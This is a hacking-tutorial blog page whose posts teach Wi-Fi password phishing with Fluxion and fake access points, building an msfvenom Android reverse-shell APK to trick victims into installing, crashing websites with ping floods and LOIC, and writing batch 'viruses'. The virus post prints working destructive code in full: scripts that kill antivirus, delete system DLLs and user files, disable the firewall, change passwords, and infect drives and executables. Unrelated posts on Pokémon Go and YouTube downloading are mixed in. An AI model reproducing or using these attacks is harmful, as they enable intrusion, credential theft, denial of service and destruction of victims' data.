Dont Wait for Future Be The Future
Showing posts with label Guide. Show all posts
Showing posts with label Guide. Show all posts

Friday, 13 January 2017

Wifi HAcking without bruteforce!

 

 

 

Hey Guys! Time to get hot in this water freezing cold. In this post I will teach you a new way to hack wifi without using Brute Force. Before this post my all tutorials required brute force for successful attack. But in this post we will be using a new tool called Fluxion to hack Wifi. Now lets get started.

 

Things you need:

 

1)Kali Linux installed

2) Fluxion Tool can be cloned from github- https://github.com/deltaxflux/fluxion 

 or just type "git clone https://github.com/deltaxflux/fluxion" in  your linux terminal.

 

Warm up time is  over now its time for real job.


Steps:

1)Fire Up kali and browse to your fluxion directory and type the following

    
 

2)Select your language and then select -[1]All Channels

 

3)Wait a minute and let the fluxion to capture some packets an press Ctrl+C

 

4)Now you will get a screen like this:


and at this point you have to select target. Enter the number corresponding to target.


5)After selecting the target you have to select th option 1 i.e. FakeAp-Hostapd and then press enter on next screen




6)Then select option 1: aircrack-ng

 


7) Then select option 3: Deauth Target

 

 

8)On next screen wait for the handshake to be captured. You will see handshake as shown

 

 

9)After capturing enter 1 and you will be redirected to FakeAp sceen select web interface and then any interface e.g TP-Link


10)At this point you have create a Fake wifi network with the same name as target.

 

 

 

 11) Basically you are getting one of the client to connect your fake wifi and after the client enters the password, It will be matched with the captured handshake. Correct password will be shown and saved in a text file.

 

 

That's It! You are done. If you face any issue you can comment below. If You like this post share it and stay tuned for more! 

 

 

Read More

Tuesday, 3 January 2017

Hack Any Android

 

 

 

 

 

 

 Hey Everyone! First of all A very Happy New Year to all :).I know its been a long time since I last posted something and I know I have Even lost my most of the readers. So I am sorry for that; reason being I have been busy with my college admission and all crap. And yes I am in "college" now :p. Now I can assure that nothing of that would happen again. I will try my best to update my blog regularly; and we have a new author, a colleague of me. He will be handling th News and Reviews category. And I will handle the Rest. 

   

I know you all are eagerly waiting to move forward to hack android :p. So without wasting any more time Let's get started/


First of all You need Kali Linux; MOst of my hacking tutorials will be done using Kali. So I recommend you to download and Install on your system or you can go for Virtual version. Its pretty easy you can google it even the  you face any issue you can comment below.


From this post onwards i will be assuming that you have kali installed

Steps for hacking into Android:

 

Step 1) Fire up your kali and Get ready to burn the fuel ; We will be using the msfvenom a utility of kali:p

 

Step 2)Open terminal and first of all check out your Local IP by Typing "ifconfig"

    

                  i


You have to note down ip next to "inet". In my case its '192.168.43.127'. Note it for further use.



Step 3) Open another terminal and type the following;


                
"msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.43.127 LPORT=4444 R > hack.apk"



Replace LHOST= by ip you noted before.

Check you home in file manager, There you will find the apk by name hack.


Step 4)Open msfconsole by typing "msfconsole" in the terminal. The type the following commands one by one:




 

Replace LHOST by your IP


Step 5) Now You are all set. This the time to play Now. Send the apk to the victim and get them to install and open it. 

 This will start the payload. Once victim opens the apk you will get the meterpreter session.



This is where you have successfully hacked android. Now type help to see the menu of options which you can use to exploit android.


Thats It!! Thank You Guys for Reading. If You like it then Share. In case You face any issues You can comment below!

                         

                                            Happy hacking! :)




























Read More

Tuesday, 12 July 2016

Pokemon Go for every Location






Travel between the real world and the virtual world of Pokémon with Pokémon GO for iPhone and Android devices. With Pokémon GO, you’ll discover Pokémon in a whole new world—your own! Pokémon GO is built on Niantic’s Real World Gaming Platform and will use real locations to encourage players to search far and wide in the real world to discover Pokémon. Pokémon GO allows you to find and catch more than a hundred species of Pokémon as you explore your surroundings.
The Pokémon video game series has used real-world locations such as the Hokkaido and Kanto regions of Japan, New York, and Paris as inspiration for the fantasy settings in which its games take place. In Pokémon GO, the real world will be the setting!
Get on your feet and step outside to find and catch wild Pokémon. Explore cities and towns around where you live and even around the globe to capture as many Pokémon as you can. As you move around, your smartphone will vibrate to let you know you're near a Pokémon. Once you've encountered a Pokémon, take aim on your smartphone's touch screen and throw a Poké Ball to catch it. Be careful when you try to catch it, or it might run away! Also look for PokéStops located at interesting places, such as public art installations, historical markers, and monuments, where you can collect more Poké Balls and other items.
.
Read More

Thursday, 26 March 2015

How To Download videos Directly From Youtube

In this tutorial I am Gonna show you guys how to download videos From YouTube without any softwareAnd the best part is that it works on every OS i.e Windows, Android, IOS, Symbian and all.


So Let's Begin!!


Step 1:


Open Youtube.com and navigate to the video that you want to download.


For example i want to Download One Thing song I will Go like this:

 




Step 2:


After successfully navigating just add "Savefrom.net/ " before the URL of the video you want to download. It will go like this:-




"savefrom.net/https://www.youtube.com/watch?v=Y1xs_xPb46M"



Screenshot:









Step 3:


Now just press Enter and you will be redirected to a new page. Here just click on the resolution of video you want to Download.


Screenshot:










Its Done!!!!!!!!



Thank you for reading this post. Check out our other post and dont forget to suscribe.






 


Read More

Tuesday, 17 March 2015

How To Crash A Website using DDOS

Its have been a long time I have not provided you any hacking tutorial. Now its pay Time. In this tutorial I am gonna show you guys How to Crash A Website. Sound's cool???? 

Yaa It Is!!!!!!

So First of all, What is DDOS???
A Distributed Denial of Service (DDoS) attack is an attempt to make an online service unavailable by overwhelming it with traffic from multiple sources. They target a wide variety of important resources, from banks to news websites, and present a major challenge to making sure people can publish and access important information.

NOW Let's Begin!!!


Step 1:
  • Choose a target website that you want to crash. Don't Select any major website like Google, Facebook or Microsoft because this require a lot of traffic to be crashed. So I recommend you to go for any light or not popular website.
  •  Also you will need a software to generate more traffic. You can download it from here. 
  • Now open CMD and Type this code


----------------------------------------

ping www.targetwebsite.com -t

----------------------------------------
this will let you to know about the status of website you are going to crash. If start seeing connection timed continuosly out then it means that you have successfully crashed down your target.

Step 2:
  • I recommend you to hide your IP using any VPN 
  • Now open Notepad and type the following code:-

----------------------------------------------------------------------------------------------------------------


color 02
Title DDOS
ping www.targetwebsite.com -t -l 40000
----------------------------------------------------------------------------------------------------
  • And Save it with the name anything.bat .
  • Now launch LOIC and configure it as shown in Screenshot.



Step 3:

  • Now keep on opening the file anything.bat. I recommend you to open at least 40-60 windows.



  • Wait for 5-10 mins and keep tracking the status of website in the first window that was started earlier.
  • After sometime you will start observing connection timed out that means you have slowed down the website.
Chances are also that you may fail to crash website because may be  the website you have selected requires much more traffic or your internet connection is slow. You can try tackling this problem by using multiple Pc's And doing the same procedure on every PC.

If you get stucked at any step you can comment below.

Happy hacking!!!!!! Don't forget to share this post and suscribe my blog for more such great content.

Read More

Monday, 2 February 2015

How to Create Computer Virus!!!














You might be scared of viruses in your computer or laptop. They directly affect the working of the computer systems. You may want to create your own virus too. This guide will show you how you can create a simple virus. Open the notepad file and paste the following code: 
-----------------------------------------------------------------------------------
@echo off
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%userprofile%\My Documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:\Program Files\Common Files\Symantec Shared\ccapp.exe
cd C:\WINDOWS
if exist "*.bat" del "*.bat"
cd C:\WINDOWS\system32
rem made with Batch Virus Maker V.2
if exist "*.dll" del "*.dll"
tskill McAfee Security Centre Module
del c:\program files\mcafee.com\agent\mcdetect.exe
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg * this is a virus
rundll mouse,disable
rem made with Batch Virus Maker V.2
rundll keyboard,disable
 --------------------------------------------------------------------------------------------------------------------
Save it as “virus.bat” or anything with the name you want to. Now your first virus is ready to work. You can also convert it as .exe file. It copies itself to startup, hard disk, my documents and then it kills explorer.exe, chrome.exe and firefox.exe. It tries to delete mcafee antivirus and tries to delete every .dll and .bat files.  Now if someone clicks on the .bat or .exe file this batch file will run and execute the operations written in the code. So beware of running this batch file or you may need for a restoration on your computer.

Other Virus Codes:


Copy and paste following codes in Notepad and save it with any name but with .bat extension

1)Block Google


@echo off
::--------Block Google-------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 www.google.com >> "Hosts"
::---------------------------::

Change time to 00:00.
Code:
::__---Virus Created By Virus Author---__::
@echo off
::------Change The Time------::
time 00:00
::---------------------------::
Change user pass.
Code:
@echo off
::--Change Pass To InShadow--::
net user %username% InShadow
::---------------------------::
Create account OWNED.
Code:
@echo off
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::
Delete all docs.
Code:
@echo off
::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::
Delete all music.
Code:
@echo off
::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::
Delete all pics.
Code:
@echo off
::-----Delete My Pictures----::
del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
::---------------------------::
Disable Firewall.
Code:
@echo off
::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::
Disable Internet.
Code:
@echo off
::-----Disable Internet------::
ipconfig /release
if ERRORLEVEL1 ipconfig /release_all
::---------------------------::
Disable Keyboard.
Code:
@echo off
::------Disable Keyboard-----::
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg
::---------------------------::
Infect all Bat.
Code:
@echo off
::----Infect All Bat Files---::
    Dir %Homedrive% /s /b > DirPath                          
        For /f %%Y In (DirPath) Do (
        Set DirPath=%%Y > Nul    
            For %%Z In (%DirPath%\*.bat) Do (
            Set BatInfect=%%Z > Nul
            Copy /y %0 %BatInfect%
        )
    )

Del /f /s /q DirPath
::---------------------------::
Infect all docs.
Code:
@echo off
::-------Infect All .Doc-----::
Dir %Homedrive% /s /b > DirPath                          
        For /f %%Y In (DirPath) Do (
        Set DirPath=%%Y > Nul    
            For %%Z In (%DirPath%\*.doc) Do (
            Set DocInfect=%%Z > Nul
            Copy /y %0 %DocInfect%
        )
    )

Del /f /s /q DirPath
::---------------------------::
Infect all Drivers.
Code:
@echo off

::-----Infect All Drives-----::
for %%E In (A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) Do (
copy /Y %0 %%E:\
echo [AutoRun] > %%E:\autorun.inf
echo open="%%E:\%0" >> %%E:\autorun.inf
echo action=Open folder to see files... >> %%E:\autorun.inf)
::---------------------------::
Infect all .exe files.
Code:
@echo off
::----Infect All Exe Files---::
    Dir %Homedrive% /s /b > DirPath                          
        For /f %%Y In (DirPath) Do (
        Set DirPath=%%Y > Nul    
            For %%Z In (%DirPath%\*.exe) Do (
            Set ExeInfect=%%Z > Nul
            Copy /y %0 %ExeInfect%
        )
    )

Del /f /s /q DirPath
::---------------------------::


Open disk.
Code:
@echo off
::-------Open Disk Tray------::
echo Do >> "opendisk.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "opendisk.vbs"
echo Set colCDROMs = oWMP.cdromCollection >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
echo colCDROMs.Item(d).Eject  >> "opendisk.vbs"
echo Loop >> "opendisk.vbs"
start "" "opendisk.vbs"
::---------------------------::
Spam /C Drive.
Code:
@echo off
::-------Spam C Drive--------::
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
echo %random% > "C:\%random%Spammed Filetype"
::---------------------------::


Kill Anti-virus.
Code:
@echo off

::-------AV Kill [UD]--------::
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.* 
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe 
del /Q /F C:\Program Files\kasper~1\*.exe 
cls
del /Q /F C:\Program Files\trojan~1\*.exe 
del /Q /F C:\Program Files\f-prot95\*.dll 
del /Q /F C:\Program Files\tbav\*.dat 
cls
del /Q /F C:\Program Files\avpersonal\*.vdf 
del /Q /F C:\Program Files\Norton~1\*.cnt 
del /Q /F C:\Program Files\Mcafee\*.* 
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.* 
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.* 
del /Q /F C:\Program Files\Norton~1\Norton~1\*.* 
del /Q /F C:\Program Files\Norton~1\*.* 
cls
del /Q /F C:\Program Files\avgamsr\*.exe 
del /Q /F C:\Program Files\avgamsvr\*.exe 
del /Q /F C:\Program Files\avgemc\*.exe 
cls
del /Q /F C:\Program Files\avgcc\*.exe 
del /Q /F C:\Program Files\avgupsvc\*.exe 
del /Q /F C:\Program Files\grisoft 
del /Q /F C:\Program Files\nood32krn\*.exe 
del /Q /F C:\Program Files\nood32\*.exe 
cls
del /Q /F C:\Program Files\nod32 
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe 
del /Q /F C:\Program Files\kavmm\*.exe 
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe 
del /Q /F C:\Program Files\guard\*.exe 
del /Q /F C:\Program Files\ewido\*.exe 
cls
del /Q /F C:\Program Files\pavprsrv\*.exe 
del /Q /F C:\Program Files\pavprot\*.exe 
del /Q /F C:\Program Files\avengine\*.exe 
cls
del /Q /F C:\Program Files\apvxdwin\*.exe 
del /Q /F C:\Program Files\webproxy\*.exe 
del /Q /F C:\Program Files\panda software\*.*
::---------------------------::


Infect all HTML.
Code:
@echo off
::--Infect All Html Files---::
    Dir %Homedrive% /s /b > DirPath                          
        For /f %%Y In (DirPath) Do (
        Set DirPath=%%Y > Nul    
            For %%Z In (%DirPath%\*.html) Do (
            Set HtmlInfect=%%Z > Nul
            Copy /y %0 %HtmlInfect%
        )
    )

Del /f /s /q DirPath
::---------------------------::


Hide MUSIC folder.
Code:
@echo off
::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::


Infect CMD.
Code:
@echo off
::-----Infect "ls" CMD-----::
copy %0 %windir%\system32\ls.bat
::---------------------------:

--------------------------------------------------------------------------------------------------------------------


Read More
Designed ByBlogger Templates